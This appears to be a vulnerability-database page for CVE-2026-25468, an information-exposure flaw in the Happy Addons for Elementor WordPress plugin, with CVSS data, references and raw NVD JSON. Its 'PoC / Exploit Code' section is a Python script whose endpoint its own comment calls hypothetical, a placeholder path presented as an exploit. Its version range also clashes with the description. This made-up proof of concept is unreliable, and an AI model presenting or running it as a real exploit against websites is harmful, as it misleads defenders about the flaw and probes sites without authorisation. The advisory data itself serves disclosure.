CVE-2026-25468

Description

Exposure of Sensitive System Information to an Unauthorized Control Sphere vulnerability in weDevs Happy Addons for Elementor allows Retrieve Embedded Sensitive Data. This issue affects Happy Addons for Elementor: from n/a through 3.20.8.

CVSS Details

CVSS Score

5.3

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

No configuration data available.

weDevs Happy Addons for Elementor <= 3.20.8

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests

# Exploit Title: Happy Addons for Elementor < 3.20.8 - Sensitive Data Exposure
# Date: 2026-05-07
# CVE: CVE-2026-25468

def check_poc(target_url):
    # Hypothetical endpoint based on plugin structure
    endpoint = "/wp-json/happy-addons/v1/some-data-endpoint"
    try:
        response = requests.get(target_url + endpoint, timeout=10)
        if response.status_code == 200:
            print("[+] Potential vulnerability detected!")
            print("Response:")
            print(response.text)
        else:
            print(f"[-] Server responded with status: {response.status_code}")
    except Exception as e:
        print(f"Error connecting to target: {e}")

if __name__ == "__main__":
    target = input("Enter target URL (e.g., http://example.com): ")
    check_poc(target)

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-25468
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-25468
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-25468/
[4] VulDB https://vuldb.com/cve/CVE-2026-25468
[5] https://patchstack.com/database/wordpress/plugin/happy-elementor-addons/vulnerability/wordpress-happy-addons-for-elementor-plugin-3-20-8-sensitive-data-exposure-vulnerability?_s_id=cve

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-25468", "sourceIdentifier": "[email protected]", "published": "2026-05-07T09:16:27.063", "lastModified": "2026-05-07T14:00:48.567", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Exposure of Sensitive System Information to an Unauthorized Control Sphere vulnerability in weDevs Happy Addons for Elementor allows Retrieve Embedded Sensitive Data.\n\nThis issue affects Happy Addons for Elementor: from n/a through 3.20.8."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-497"}]}], "references": [{"url": "https://patchstack.com/database/wordpress/plugin/happy-elementor-addons/vulnerability/wordpress-happy-addons-for-elementor-plugin-3-20-8-sensitive-data-exposure-vulnerability?_s_id=cve", "source": "[email protected]"}]}}